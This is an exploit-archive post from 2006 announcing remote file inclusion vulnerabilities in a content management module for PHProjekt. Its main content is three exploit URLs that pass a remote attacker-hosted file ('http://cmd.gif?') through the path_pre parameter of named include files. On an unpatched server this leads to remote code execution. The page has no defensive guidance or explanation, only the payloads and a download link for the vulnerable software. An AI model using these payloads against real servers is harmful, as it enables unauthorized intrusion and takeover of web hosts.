PHProjekt <= 6.1 (path_pre) Multiple Remote File Include Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHProjekt <= 6.1 (path_pre) Multiple Remote File Include Vulnerabilities
# Published : 2006-08-21
# Author : the master
# Previous Title : Simple Machines Forum <= 1.1 rc2 Lock Topics Remote Exploit
# Next Title : PHlyMail Lite <= 3.4.4 (folderprops.php) Remote Include Vulnerability (2)

########################################################################
#  Content management module for PHProjekt v0.6.1  Remote File Inclusion Vulnerability
#
#  Download: http://www.mariovaldez.net/software/cm_4p/files/cm4p_0.6.1.tar.gz
#
#  Found By: the master
#
########################################################################
#  exploit:
#
#  http://[Target]/[Path]/cm_navigation-33.inc.php?path_pre=http://cmd.gif?
#  http://[Target]/[Path]/cm_navigation.inc.php?path_pre=http://cmd.gif?
#  http://[Target]/[Path]/cm_summary.inc.php?path_pre=http://cmd.gif?
########################################################################

# www.Syue.com [2006-08-21]